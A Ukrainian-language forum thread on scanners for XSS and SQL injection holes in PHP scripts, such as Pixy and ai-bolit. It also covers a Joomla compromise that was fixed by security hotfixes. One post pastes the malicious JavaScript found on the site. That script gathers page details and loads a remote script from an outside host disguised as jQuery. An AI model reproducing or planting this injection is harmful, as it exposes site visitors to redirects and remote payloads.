Перевірка скриптів на наявність XSS/SQLI

[shaman]

Проект венського Університету Інформаційних Технологій розробив утиліту для комплексного сканування файлів на наявність вразливостей XSS та SQL injection.

Програма написана на мові java і здатна працювати локально. Скачати та ознайомитись з документацією можна тут:
_http://pixybox.seclab.tuwien.ac.at/pixy/index.php
Також існує тестова онлайн-версія, де в реальному часі можна просканувати підозрілий файл:
_http://pixybox.seclab.tuwien.ac.at/pixy/webinterface.php

Зауваження
При скануванні файлів joomla, скрипт вважає підозрілою частовживану змінну

проте, як зазначив Smart на joomlaforum.ru - це не є критичною вразливістю, особливо якщо вимкнені register_globals.

п.с. Звісно, програма не замінить людську логіку, проте значно звузить коло пошуку і збереже дорогий адміністратору час

[Dutch]

Я б ще додав би до списку хороший скрипт ai-bolit!

https://revisium.com/ai/

[fedun]

В мене ця фігня. Як закрити діру, на всіх версіях джумла включаючи останню. :evil: :evil: :evil:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.elkonenerji.com.tr/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

[fedun]

по ходу закрили дирку, критичні виправлення безпеки у всіх версіях джумла, обновляємось до 3,4,8
https://docs.joomla.org/Security_hotfixe...L_versions
для старих версій є патчі :Yahoo!: